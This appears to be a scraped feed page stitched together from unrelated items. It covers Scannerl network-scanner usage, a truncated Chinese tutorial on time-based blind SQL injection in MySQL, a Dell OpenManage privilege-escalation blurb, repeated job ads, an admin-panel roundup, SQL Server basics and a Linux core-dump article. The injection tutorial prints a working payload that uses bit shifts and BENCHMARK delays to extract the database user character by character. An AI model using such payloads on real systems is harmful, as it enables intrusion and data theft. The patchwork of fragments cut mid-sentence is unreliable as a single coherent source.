See the wiki for more.

Standalone usage
Scannerl can be used on the local host without any other host. However, it will still create a slave node on the same host it is run from. Therefore, the requirements described in Distributed setup must also be met.
A quick way to do this is to make sure your host is able to resolve itself with
grep -q "127.0.1.1\s*`hostname`" /etc/hosts || echo "127.0.1.1 `hostname`" | sudo tee -a /etc/hosts
and create an SSH key (if not yet present) and add it to the authorized_keys (you need an SSH server running):
cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys
The following example runs an HTTP banner grabing on google.com from localhost
./scannerl -m httpbg -d google.com

Distributed usage
In order to perform a distributed scan, one need to pre-setup the hosts that will be used by scannerl to distribute the work. See Distributed setup for more information.
Scannerl expects a list of slaves to use (provided by the -s or -S switches).
./scannerl -m httpbg -d google.com -s host1,host2,host3

List available modules
Scannerl will list the available modules (output modules as well as fingerprinting modules) with the -l switch:
$ ./scannerl -l

Fingerprinting modules available
================================

bacnet UDP/47808: Bacnet identification
chargen UDP/19: Chargen amplification factor identification
fox TCP/1911: FOX identification
httpbg TCP/80: HTTP Server header identification
- Arg1: [true|false] follow redirection [Default:false]
httpsbg SSL/443: HTTPS Server header identification
https_certif SSL/443: HTTPS certificate graber
imap_certif TCP/143: IMAP STARTTLS certificate graber
modbus TCP/502: Modbus identification
mqtt TCP/1883: MQTT identification
mqtts TCP/8883: MQTT over SSL identification
mysql_greeting TCP/3306: Mysql version identification
pop3_certif TCP/110: POP3 STARTTLS certificate graber
smtp_certif TCP/25: SMTP STARTTLS certificate graber
ssh_host_key TCP/22: SSH host key graber

Output modules available
========================

csv output to csv
- Arg1: [true|false] save everything [Default:true]
csvfile output to csv file
- Arg1: [true|false] save everything [Default:false]
- Arg2: File path
file output to file
- Arg1: File path
file_ip output to stdout (only ip)
- Arg1: File path
file_mini output to file (only ip and result)
- Arg1: File path
file_resultonly output to file (only result)
- Arg1: File path
stdout output to stdout
stdout_ip output to stdout (only IP)
stdout_mini output to stdout (only ip and result)

Modules arguments
Arguments can be provided to modules with a colon. For example for the file output module:
./scannerl -m httpbg -d google.com -o file:/tmp/result

Result format
The result returned by scannerl to the output modules has the following form:
{module, target, port, result}
Where
  • module: the module used (Erlang atom)
  • target: IP or hostname (string or IPv4 address)
  • port: the port (integer)
  • result: see below
The result part is of the form:
{{status, type},Value}
Where {status, type} is one of the following tuples:
  • {ok, result}: fingerprinting the target succeeded
  • {error, up}: fingerprinting didn't succeed but the target responded
  • {error, unknown}: fingerprinting failed
Value is the returned value - it is either an atom or a list of element

Extending Scannerl
Scannerl has been designed and implemented with modularity in mind. It is easy to add new modules to it:
  • Fingerprinting module: to query a specific protocol or service. As an example, the fp_httpbg.erl module allows to retrieve the server entry in the HTTP response.
  • Output module: to output to a specific database/filesystem or output the result in a specific format. For example, the out_file.erl and out_stdout.erl modules allow respectively to output to a file or to stdout (default behavior if not specified).
To create new modules, simply follow the behavior (fp_module.erl for fingerprinting modules and out_behavior.erl for output module) and implement your modules.
New modules can either be added at compile time or dynamically as an external file.
See the wiki page for more.


Download Scannerl

          使用MySQL位函数和运算符进行基于时间的高效SQL盲注      Cache   Translate Page      
在2011年至2012年间,我曾对MySQL数据库集成的各种PHP应用程序进行了一系列的渗透测试。在此期间我发现,这些数据库大都易受到基于时间的SQL盲注攻击。但由于各种限制措施,想要利用它们并不容易。为此,我开始在网上寻求答案。偶然间,我翻阅到了一篇有关使用位移技术进行SQL注入的文章。这篇博文向我们展示了如何使用“右移”运算符(>>),枚举从SQL查询返回值的二进制位。 注:有关位功能和操作符的完整说明请参阅:https://dev.mysql.com/doc/refman/5.7/en/bit-functions.html 右移位运算符会将二进制值1位的位数向右移位,如下所示: mysql> select ascii(b'01110010'); +--------------------+ | ascii(b'01110010') | +--------------------+ |                114 | +--------------------+ 1 row in set (0.00 sec) mysql> select ascii(b'01110010') >> 1; +-------------------------+ | ascii(b'01110010') >> 1 | +-------------------------+ |                      57 | +-------------------------+ 1 row in set (0.00 sec) 这可用于在SQL盲注时枚举字符串的字符。如果数据出现在完整的ASCII表中,则每个字符最多可以枚举8个请求。 这里我们希望提取的数据是select user()查询返回的第一个字符。 第1位: 我们首先找到第一位的值: ???????? 有两种可能性: 0 (Decimal value: 0) // TRUE condition 或 1 (Decimal value: 1) // FALSE condition mysql> select if ((ascii((substr(user(),1,1))) >> 7 )=0,benchmark(10000000,sha1('test')), 'false'); +--------------------------------------------------------------------------------------+ | if ((ascii((substr(user(),1,1))) >> 7 )=0,benchmark(10000000,sha1('test')), 'false') | +--------------------------------------------------------------------------------------+ | 0                                                                                    | +--------------------------------------------------------------------------------------+ 1 row in set (2.35 sec) SQL查询导致时间延迟,因此条件为TRUE,第一位为0 0??????? 第2位: 现在我们来查找第二位的值,和上面一样有两种可能性: 00 (Decimal value: 0) // TRUE condition 或 01 (Decimal […]
          Full Stach Java En Argentina En Argentina      Cache   Translate Page      
Argentina - Empleo: Detalles de la oferta Estamos en la busqueda de un desarrollador Java con conocimientos de Grails con buen nivel de desarrollo, con ganas de crecer y participar en equipo de desarrollo. Skills: Java / Grails MySQL / PostgreSQL Algun motor NoSQL, preferentement...
          Dell OpenManage Network Manager 6.2.0.51 SP3 Privilege Escalation      Cache   Translate Page      
Dell OpenManage Network Manager exposes a MySQL listener that can be accessed with default credentials. This MySQL service is running as the root user, so an attacker can exploit this configuration to, e.g., deploy a backdoor and escalate privileges into the root account.
          web and android system      Cache   Translate Page      
Member levels Calculation player input admin set the output result and the data will be save as report to show for user (Budget: $750 - $1500 USD, Jobs: Android, Mobile App Development, MySQL, PHP, Software Architecture)
          Electronic Signature Ecuador      Cache   Translate Page      
Hello XAdEBES Electronic Signature for Ecuador SRI. In Php Zend Framework 3. Sending and receiving receipt to the WS of the SRI the information is in Spanish ... you have to follow the sri guidelines... (Budget: $30 - $250 CAD, Jobs: MySQL, PHP, Software Architecture, XML)
          recode website      Cache   Translate Page      
I have a web site for elearning written from a long time with asp classic and ms access, I need to re-code it in PHP because the change of the host. total asp files about 55 files. (Budget: $250 - $750 USD, Jobs: ASP, HTML, MySQL, PHP, Website Design)
          Lập Trình Viên PHP      Cache   Translate Page      
Tp Hồ Chí Minh - Đăng nhập bằng: Lập Trình Viên PHP Công Ty Cổ Phần Việt Nam Booking Ngày cập nhật: 06/11/2018 Thông Tin Tuyển Dụng Nơi làm việc... lập trình & tư duy thuật toán tốt; - Thành thạo PHP & MySQL, HTML, CSS, Javascript (Jquery), Wordpress; - Có khả năng thiết kế và tối ưu...
          Comment on JDBC Batch insert update MySQL Oracle by learner001      Cache   Translate Page      
I still dont get the point of batch processing. Why it is so? what is the point of using batch processing?
          Comment on Spring MVC Hibernate MySQL Integration CRUD Example Tutorial by Aishwarya      Cache   Translate Page      
How should i connect it to mysql. Do I need to create tables there. Please let me know the whole procedure
          Comment on Android Login and Registration With PHP MySQL by Fateh Akmal      Cache   Translate Page      
Thank You Very Much for the tutorial, I did it 1st time and it worked successfully. Now I need to display the detail of the user that has logged in. Would you mine to share the tutorial to display user's information from the database please~? Thank You
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Technical Architect - Data Solutions - CDW - Milwaukee, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Milwaukee, WI jobs
          Technical Architect - Data Solutions - CDW - Madison, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Madison, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page      
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sun, 28 Oct 2018 21:34:20 GMT - View all Bellevue, WA jobs
          few modif on a web plateform      Cache   Translate Page      
Do some correction on a online stock system (Budget: $10 - $30 USD, Jobs: CSS, HTML, MySQL, PHP, Website Design)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          few modif on a web plateform      Cache   Translate Page      
Do some correction on a online stock system (Budget: $10 - $30 USD, Jobs: CSS, HTML, MySQL, PHP, Website Design)
          convert a php site to native android      Cache   Translate Page      
a prebuilt php site is to be converted into a native android app (Budget: ₹600 - ₹1500 INR, Jobs: Android, HTML, MySQL, PHP)
          Admin Panel Roundup      Cache   Translate Page      
Admin PanelRoundup
Admin Panel Roundup

Note: this was originally published on the Retool blog .

Let’s say you need to moderate content on your platform, delete somebody’s account, or find out which of your users are most active. An admin panel is where you’d do it!

They’re good for a few things:

Housekeeping ― keeping your app running smoothly with tasks involving human input. Fire fighting ― manually fixing unintended problems that occur in your app. Monitoring ― tracking your app’s metrics.

There are a few off the shelf options for building admin interfaces:

Database GUI Clients Frontend admin libraries Backend admin frameworks 3rd-party admin tools

They’re all good at specific things. Let’s see how you can decide between them.

Database GUIClients
Admin Panel Roundup

Database clients are just spreadsheet-like interfaces on top of your database that let you perform CRUD operations easily. They aren’t really an “admin panel”, but they do the job if all you want is raw database access. Here are our recommendations:

SQL: Free: Postico (PostgreSQL), Sequel Pro (mysql) Paid: DataGrip mongoDB: Free: Robo 3T Paid: Studio 3T

Database clients are good for firefighting.They give you complete control over your data, so you can do whatever it takes to fix problems. This is a double-edged sword though ― you might accidentally break something in the process. And if you’re scaling this out to your team, you probably don’t want everybody to have raw SQL access to your database. They could insert data that bypasses your app’s validations, delete rows accidentally, etc.

Database clients are bad for housekeeping.Their UIs aren’t optimized for data entry, so doing it regularly will be unpleasant. There’s also no way to automate common workflows ― you won’t be able to, say, approve a new comment on your blog in one click.

Database clients are bad for monitoring.At a stretch, you might be able to save queries that output your key metrics, but you’ll have to run these manually and visualize the results elsewhere.

Database clients are impossible to extend.Extending them beyond the standard CRUD use case is impossible, and involves building ETL pipelines to get the data out.

A database client makes a good admin panel if

Your project will be used infrequently You don’t need to monitor your project’s usage and metrics Your project will only be used by people who are technical Frontend Admin Templates

There are lots of templates and libraries out there that provide frontend components and layouts that you can use to build admin panels. You can find templates for whichever frontend framework you use ― Bootstrap , React , Angular , you name it.

You’ll have to write code to connect the frontend to your databases and APIs, but you’ll get a decent UX out-of-the-box without much CSS and JS fiddling.

There’s one big trap to watch out for with frontend templates ― visuals.

When you’re choosing a library, the options will seem endless. Each will look better than the last. Progress bars, graphs, widgets ― they’ll promise to turn your admin panel into NASA mission control . The truth is more mundane ― you don’t need a progress bar, you might need a graph.


Admin Panel Roundup

It’s important to optimize for utility over visuals. Your frontend admin template should work with the technologies you already use (even if it’s not the hottest JS framework), and should be easy to maintain and extend as your app evolves. Choose the boring template that does the job over the trending template that comes with 3 icon sets.

Frontend templates are great for housekeeping.They provide a good UX for data entry and editing (including data validation), and you can hook them up to trigger custom workflows.

Frontend templates are great for monitoring.You can set them up to display metrics for your business, easily visualized in charts.

Frontend templates are okay for firefighting.You can set them up to give you a lot of control in editing data, but they won’t be as flexible as a database client and you may face novel problems that require manually digging into the database to solve.

Frontend templates can be difficult to maintain and extend. Because these libraries only give you the components, you have to write custom code to put them together and connect them to your backend. Custom code has an up-front cost to write, and a continual cost to maintain.

Frontend libraries are a good option that reduce the amount of work it takes to build your own admin panel. They’re great once they’re set up, but it does take some work to get started and maintain.

Backend Admin Libraries

Popular backend frameworks have libraries that make it easy to build admin panels for your app. In some cases, they work like magic ― they can generate an entire admin panel without any extra code. In other cases, you might have to write some backend code or combine them with a frontend library.

All libraries have a trade-off between automation and customizability. We recommend a bias towards automation ― the less code you write, the smaller the surface area for errors.

Django ― DjangoAdmin
Admin Panel Roundup

Django Admin is a no-brainer if you have a Django backend. It automatically generates an admin site for your app, letting you perform CRUD operations for your database models. It comes with user authentication and permissions out of the box, as well as an audit log of “recent actions” ― useful if you have multiple admin users.

Django Admin is really extensible ― you can customize it to do pretty much anything with code. The default UI it generates won’t be as “sexy” as some of the frontend admin libraries, but it’s usable and refreshingly simple.

Django Admin is much like a database GUI client, though, in the sense that it only supports CRUD out of the box. It comes with all the validations you have in your Django app, but no more. The main advantage is that you can write custom code to add validations. But once you start writing custom code, you’re basically building most of your admin panel from
          MySQL Replication: Temporary tables allowed in transactions with GTIDs (no replies)      Cache   Translate Page      
https://mysqlhighavailability.com/temporary-tables-are-now-allowed-in-transactions-when-gtids-are-enabled/
          MySQL 8.0: HA with InnoDB Cluster + Shell (no replies)      Cache   Translate Page      
MySQL 8.0: HA with InnoDB Cluster + Shell
https://www.slideshare.net/miguelgaraujo/mysql-8-high-availability-with-innodb-clusters
          MySQL Shell: The DevOps Tool for MySQL (no replies)      Cache   Translate Page      
MySQL Shell: The DevOps Tool for MySQL
https://www.slideshare.net/miguelgaraujo/mysql-shell-the-devops-tool-for-mysql-121929980
          MySQL Group Replication: instrumentation for memory used in XCom (no replies)      Cache   Translate Page      
https://mysqlhighavailability.com/extending-replication-instrumentation-account-for-memory-used-in-xcom/
          convert a php site to native android      Cache   Translate Page      
a prebuilt php site is to be converted into a native android app (Budget: ₹600 - ₹1500 INR, Jobs: Android, HTML, MySQL, PHP)
          Tech Roundup - 6th November 2018      Cache   Translate Page      
Stuff collated since Tech Roundup - 23rd September 2018. With headings:
Cisco (FlexPod), CompTIA (and Cybersecurity), Flackbox, Industry Commentary, Microsoft, NetApp, Veeam, VMware

Cisco (FlexPod)

FlexPod Datacenter with Cisco ACI Multi-Pod, NetApp MetroCluster IP, and VMware vSphere 6.7 Design Guide

FlexPod Datacenter with Cisco ACI Multi-Pod, NetApp MetroCluster IP, and VMware vSphere 6.7 Deployment Guide

CompTIA (and Cybersecurity)

Cool Jobs: Using Cybersecurity to Protect Nuclear Power Plants

Cybersecurity Careers: Learn More About Penetration Testing

Cybersecurity Certificates, Certifications and Degrees: How to Choose

CASP vs. CISSP: 4 Advantages of CompTIA’s Advanced Cybersecurity Certification

Flackbox

List of VSA Virtual Storage Appliances and SAN Storage Simulators

Industry Commentary

Six Reasons for Multi-Cloud Computing

IBM, Red Hat and Multi-Cloud Management: What It Means for IT Pros

Microsoft

Azure File Sync is now available to the public
*Posted on Tuesday, September 26, 2017

NetApp

General

NetApp Cloud API Documentation

Image: NetApp Cloud API Documentation

Cloud Volumes Services

NetApp Kubernetes Service Demo

Azure NetApp Files Demo

NetApp Cloud Volumes Service for AWS Demo

File Storage for AWS is Now Simpler and Faster

Discover How Data Creates Medical Breakthroughs

Transforming Medical Care With Data in the Cloud (Changing the World with Data)

DreamWorks Animation: Creating at the Speed of Imagination

Building Big Data Analytics Application on AWS with NetApp Cloud Volumes

Scaling Oracle Databases in the Cloud with NetApp Cloud Volumes

NetApp Cloud Volumes as a Persistent Storage Solution for Containers

New TRs


New NVAs (NetApp Verified Architectures)

VMware Private Cloud on NetApp HCI: NVA Design

Red Hat OpenShift Container Platform with NetApp HCI: NVA Design
Red Hat OpenShift Container Platform
The Easy Button for Delivering Better Experiences. Faster. With NetApp and Red Hat.

New Posts by Justin Parisi


New on Tech ONTAP Podcast (hosted by Justin Parisi)


New on ThePub

October 2: My Name is Rocky

New on wfaguy.com


Veeam

Veeam Backup & Replication: Quick Migration

VMware

Introducing Project Dimension

VMworld 2018: We’re Rethinking the Limits of Innovation

Taking Innovation to New and Unexpected Levels at VMworld 2018

What’s New in vSAN6.7 Update 1

What’s New in vRealize Operations 7.0

Building on the Success of Workspace ONE

Solution Brief: SD-WAN Simplified


          PHP Developer      Cache   Translate Page      
ShreeRam Technology Solution Pvt. Ltd - Indore, Madhya Pradesh - databases, and version control tools. 3) Experience with PHP 5 and other relevant tools. 4) Ability to work with UNIX commands. 5) Integrate... and functionalityRequired Experience, Skills and Qualifications PHP MySQL PHP5 Javascript Job Type: Full-time Salary: 12,000.00 to 30,000.00 /month Education...
          PHP Developer      Cache   Translate Page      
Digital Inbox - Noida, Uttar Pradesh - Required skills: Experience in HTML, CSS, and JavaScript, Wordpress, Core Php, Codeigniter, Deep expertise with supporting web standards... technologies, including WordPress, MYSQL, CMS platforms such as Magento, Core Php, Codeigniter, Familiarity with Social APIs: Facebook, Twitter...
          PHP Developer      Cache   Translate Page      
PayMiTime - Hyderabad, Telangana - Andhra Pradesh - . Follow industry best practices. Develop and deploy new features. Requirements: Proven software development experience in PHP. Demonstrable... services [MYSQL is must]. Should have worked on PHP framework CodeIgniter B.tech/BCA/BS/M.tech/MCA/MS degree in computer science or related subject...
          PHP Developer      Cache   Translate Page      
Galaxy Resource Pvt Ltd - Lucknow, Uttar Pradesh - Position: Backend developer with core skillset on PHP, MongoDB, MySQL and Couchbase. Experience : 2-5 years 1. Should have hands... on knowledge in PHP and Web development projects. 2. Good in OOPS concepts 3. Should have hands on experience in Yii Framework 4. Good working...
          Senior PHP Developer      Cache   Translate Page      
Showflipper Entertainment & Production P. Ltd - Pune, Maharashtra - person Required Experience, Skills and Qualifications Skills we are looking for : - Proficiency in PHP, JavaScript, Jquery, JS libraries , MySQL...
          Build Website/Webapplication      Cache   Translate Page      
I am looking for someone or a team to build me a new Webservice. It shall be similar to a classifieds portal but offers also the possibility to rate products. It must be able to handle a lot of users,... (Budget: $1500 - $3000 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Build Website/Webapplication      Cache   Translate Page      
I am looking for someone or a team to build me a new Webservice. It shall be similar to a classifieds portal but offers also the possibility to rate products. It must be able to handle a lot of users,... (Budget: $1500 - $3000 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          SQL Server数据库入门基础知识      Cache   Translate Page      
SQL Server数据库相关知识点

1、为什么要使用数据库?

数据库技术是计算机科学的核心技术之一。使用数据库可以高效且条理分明地存储数据、使人们能够更加迅速、方便地管理数据。数据库具有以下特点:

可以结构化存储大量的数据信息,方便用户进行有效的检索和访问

可以有效地保持数据信息的一致性.完整性,降低数据冗余

可以满足应用的共享和安全方面的要求

2、数据库的基本概念

⑴什么是数据?

数据就是描述事物的符号记录,数据包括数字、文字、图形、声音、图像等;数据在数据库中以“记录”的形式存储,相同格式和类型的数据将存放在一起;数据库中,每一行数据就是一条“记录”。

⑵什么是数据库和数据库表?

不同的记录组织在一起就是数据库的“表”,也就数说表就是来存放数据的,而数据库就是“表”的集合。

⑶什么是数据库管理系统?

数据库管理系统(DBMS)是实现对数据库资源有效组织、管理和存取的系统软件。它在操作系统的支持下,支持用户对数据库的各种操作。DBMS主要有以下功能:

数据库的建立和维护功能:包括建立数据库的结构和数据的录入与转换、数据库的转储与恢复、数据库的重组与性能监视等功能

数据定义功能:包括定义全局数据结构、局部逻辑数据结构、存储结构、保密模式及数据格式等功能。保证存储在数据库中的数据正确、有效和相容,以防止不合语义的错误数据被输入或输出,

数据操纵功能:包括数据查询统计和数据更新两个方面

数据库的运行管理功能:这是数据库管理系统的核心部分,包括并发控制、存取控制、数据库内部维护等功能

通信功能:DBMS与其他软件之间的通信

⑷什么是数据库系统?

数据库系统是一人一机系统,一由硬件、操作系统、数据库、DBMS、应用软件和数据库用户组成。

⑸数据库管理员(DBA)

一般负责数据库的更新和备份、数据库系统的维护、用户管理工作、保证数据库系统的正常运行。

3、数据库的发展过程

初级阶段-第一代数据库:在这个阶段IBM公司研制的层次模型的数据库管理系统-IMS问世

中级阶段-关系数据库的出现:DB2的问世、SQL语言的产生

高级阶段-高级数据库:各种新型数据库的产生;如工程数据库、多媒体数据库、图形数据库、智能数据库等

4、数据库的三种模型

网状模型:数据关系多对多、多对一,较复杂

层次模型:类似与公司上下级关系

关系模型:实体(实现世界的事物、如×××、银行账户)-关系

5、当今主流数据库

SQLServer:Microsoft公司的数据库产品,运行于windows系统上。

Oracle:甲骨文公司的产品;大型数据库的代表,支持linux、unix系统。

DB2:IBM公司的德加考特提出关系模型理论,13年后IBM的DB2问世

mysql:现被Oracle公司收购。运行于linux上,Apache和Nginx作为Web服务器,MySQL作为后台数据库,php/Perl/python作为脚本解释器组成“LAMP”组合

6、关系型数据库

⑴基本结构

关系数据库使用的存储结构是多个二维表格,即反映事物及其联系的数据描述是以平面表格形式体现的。在每个二维表中,每一行称为一条记录,用来描述一个对象的信息:每一列称为一个字段,用来描述对象的一个属性。数据表与数据库之间存在相应的关联,这些关联用来查询相关的数据。关系数据库是由数据表之间的关联组成的。其中:

数据表通常是一个由行和列组成的二维表,每一个数据表分别说明数据库中某一特定的方面或部分的对象及其属性

数据表中的行通常叫做记录或者元组,它代表众多具有相同属性的对象中的一个

数据表中的列通常叫做字段或者属性,它代表相应数据库中存储对象的共有的属性

⑵主键和外键

主键:是唯一标识表中的行数据,一个主键对应一行数据;主键可以有一个或多个字段组成;主键的值具有唯一性、不允许为控制(null);每个表只允许存在一个主键。

外键:外键是用于建立和加强两个表数据之间的链接的一列或多列;一个关系数据库通常包含多个表,外键可以使这些表关联起来。

⑶数据完整性规则

实体完整性规则:要求关系中的元组在主键的属性上不能有null

域完整性规则:指定一个数据集对某一个列是否有效或确定是否允许null

引用完整性规则:如果两个表关联,引用完整性规则要求不允许引用不存在的元组

用户自定义完整性规则

7、SQLServer系统数据库

master数据库:记录系统级别的信息,包括所有的用户信息、系统配置、数据库文件存放位置、其他数据库的信息。如果该数据库损坏整个数据库都将瘫痪无法使用。

model数据库:数据库模板

msdb数据库:用于SQLServer代理计划警报和作业

tempdb数据库:临时文件存放地点

SQL Server数据库文件类型

数据库在磁盘上是以文件为单位存储的,由数据文件和事务日志文件组成,一个数据库至少应该包含一个数据文件和一个事务日志文件。

数据库创建在物理介质(如硬盘)的NTFS分区或者FAT分区的一个或多个文件上,它预先分配了将要被数据和事务日志所使用的物理存储空间。存储数据的文件叫做数据文件,数据文件包含数据和对象,如表和索引。存储事务日志的文件叫做事务日志文件(又称日志文件)。在创建一个新的数据库的时候仅仅是创建了一个“空壳,必须在这个“空壳”中创建对象(如表等),然后才能使用这个数据库。

SQLServer2008数据库具有以下四种类型的文件

主数据文件:主数据文件包含数据库的启动信息,指向数据库中的其他文件,每个数据库都有一个主数据文件,主数据文件的文件扩展名是.mdf。

次要(辅助)数据文件:除主数据文件以外的所有其他数据文件都是次要数据文件,某些数据库可能不包含任何次要数据文件,而有些数据库则包含多个次要数据文件,次要数据文件的文件扩展名是.ndf。

事务日志文件:包含恢复数据库所有事务日志的信息。每个数据库必须至少有一个事务日志文件,当然也可以有多个,事务日志文件的推荐文件扩展名是.ldf。

文件流( Filestream):可以使得基于 SQLServer的应用程序能在文件系统中存储非结构化的数据,如文档、图片、音频等,文件流主要将SQLServer数据库引擎和新技术文件系统(NTFS)集成在一起,它主要以varbinary (max)数据类型存储数据。

Linux公社的RSS地址 : https://www.linuxidc.com/rssFeed.aspx

本文永久更新链接地址: https://www.linuxidc.com/Linux/2018-11/155182.htm


          What are the implications of memory for passing a MySQLi result to a function in ...      Cache   Translate Page      

Dear gods of Stackoverflow

Let's say I have a mysql query that selects a large dataset:

$query = "SELECT col_1, col_2, ..., col_99 FROM big_table";

And I get a MySQLi result like so:

$result = $db->query($query);

But then instead of dealing with $result in this scope, I pass it to a function:

my_function($result);

And once inside my_function(), I iterate through each row in the result and do stuff:

function my_function($result) { while($row = $result->fetch_object()) { ... } }

Please help me understand the memory implications of this approach.

In other words, what does $result contain, and are there any pitfalls with passing it to a function? Should I consider passing $result by reference instead? For what it's worth, I won't be needing $result once my_function() is done with it.

Cheers from South Africa!


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          core 文件      Cache   Translate Page      

引言

某台服务器业务进程挂了,研发反映没看到 core 文件生成。   于是我们来排查下是什么原因造成 core 文件没生成。

什么是 core 文件

NAME
core - core dump file

The default action of certain signals is to cause a process to terminate and produce a core dump file,
a disk file containing an image of the process's memory at the time of termination.
This image can be used in a debugger (e.g., gdb(1)) to inspect the state of the program
at the time that it terminated.
A list of the signals which cause a process to dump core can be found in signal(7).

简介: 在一个程序崩溃时,它一般会在指定目录下生成一个 core 文件。 core 文件是一个内存映象(同时加上调试信息),主要是用来调试的。

配置系统生成 core 文件

使用 ulimit 配置生成 core 文件大小

首先使用ulimit -a确认系统是否生成 core 文件 看第一行core file size,若为 0,说明禁用了 core 文件生成,若要启用,根据需要配置 core 文件生成大小。 如不限制 core 文件大小,如下设置:
ulimit -c unlimited

系统没生成 core 文件的原因

如在 ulimit 设置了生成 core 文件,还是没有生成 core,可能是什么原因呢?
man core里面说了可能的原因,如下:
There are various circumstances in which a core dump file is not produced:

* The process does not have permission to write the core file.
(By default the core file is called core, and is created in the current working directory.
See below for details on naming.)
Writing the core file will fail if the directory in which it is to be created is nonwritable,
or if a file with the same name exists and is not writable or is not a regular file
(e.g., it is a directory or a symbolic link).

* A (writable, regular) file with the same name as would be used for the core dump already exists,
but there is more than one hard link to that file.

* The file system where the core dump file would be created is full; or has run out of inodes;
or is mounted read-only; or the user has reached their quota for the file system.

* The directory in which the core dump file is to be created does not exist.

* The RLIMIT_CORE (core file size) or RLIMIT_FSIZE (file size) resource limits for the process
are set to zero; see getrlimit(2) and the documentation of the shell's ulimit command
(limit in csh(1)).

* The binary being executed by the process does not have read permission enabled.

* The process is executing a set-user-ID (set-group-ID) program that is owned by a user (group)
other than the real user (group) ID of the process. (However, see the description of the prctl(2)
PR_SET_DUMPABLE operation, and the description of the /proc/sys/fs/suid_dumpable file in proc(5).)

* (Since Linux 3.7) The kernel was configured without the CONFIG_COREDUMP option.

In addition, a core dump may exclude part of the address space of the process
if the madvise(2) MADV_DONTDUMP flag was employed.

可能的情况比较多。
以下引用他人总结的:

一、要保证存放 coredump 的目录存在且进程对该目录有写权限。
存放 coredump 的目录即进程的当前目录,一般就是当初发出命令启动该进程时所在的目录。
但如果是通过脚本启动,则脚本可能会修改当前目录,这时进程真正的当前目录就会与当初执行脚本所在目录不同。
这时可以查看"/proc/<进程pid>/cwd"符号链接的目标来确定进程真正的当前目录地址。
通过系统服务启动的进程也可通过这一方法查看。

二、若程序调用了 seteuid()/setegid() 改变了进程的有效用户或组,则在默认情况下系统不会为这些进程生成 coredump。
很多服务程序都会调用 seteuid(),如 MySQL,不论你用什么用户运行 mysqld_safe 启动 MySQL,
mysqld 运行的有效用户始终是 msyql 用户。
如果你当初是以用户 A 运行了某个程序,但在 ps 里看到的这个程序的运行用户却是 B 的话,那么这些进程就是调用了 seteuid 了。
为了能够让这些进程生成 core dump,需要将 /proc/sys/fs/suid_dumpable 文件的内容改为 1(一般默认是 0)。

三、要设置足够大的 coredump 文件大小限制。
程序崩溃时生成的 core 文件大小即为程序运行时占用的内存大小。
但程序崩溃时的行为不可按平常时的行为来估计,比如缓冲区溢出等错误可能导致堆栈被破坏,
因此经常会出现某个变量的值被修改成乱七八糟的,然后程序用这个大小去申请内存就可能导致程序比平常时多占用很多内存。
因此无论程序正常运行时占用的内存多么少,要保证生成 core 文件还是将大小限制设为 unlimited 为好。

</pre>

# 实例分析

```bash

# 1. 业务进程设置了 SUID
[root@xxx_game ~]# ll /home/xxx/global/app/globalserver
-rws--s--x 1 root root 737162 Mar 11 04:07 /home/xxx/global/app/globalserver

# 2. 普通用户启动了该业务进程
[root@xxx_game ~]# grep su /home/xxx/global/start.sh
su - xxx -c "cd /home/xxx/global/app;./globalserver -d"

[root@xxx_game ~]# ps aux | grep globalserver | grep -v grep
root 28448 0.2 1.2 270452 208996 ? Sl 11:16 0:55 ./globalserver -d

# 3. suid_dumpable 为 0,所以 suid 程序不能生成 core 文件
[root@xxx_game ~]# cat /proc/sys/fs/suid_dumpable
0

```

以上情况的解决方法是设置`/proc/sys/fs/suid_dumpable`成 1


# Ref
[Linux core 文件介绍](http://www.cnblogs.com/dongzhiquan/archive/2012/01/20/2328355.html)
[Linux 下 core 文件产生的一些注意问题](http://blog.csdn.net/fengxinze/article/details/6800175)
[Linux 下如何产生 core 文件(core dump 设置)](http://blog.csdn.net/star_xiong/article/details/43529637)
[coredump 设置方法](http://blog.csdn.net/wj_j2ee/article/details/7161586)

           TiKV      Cache   Translate Page      
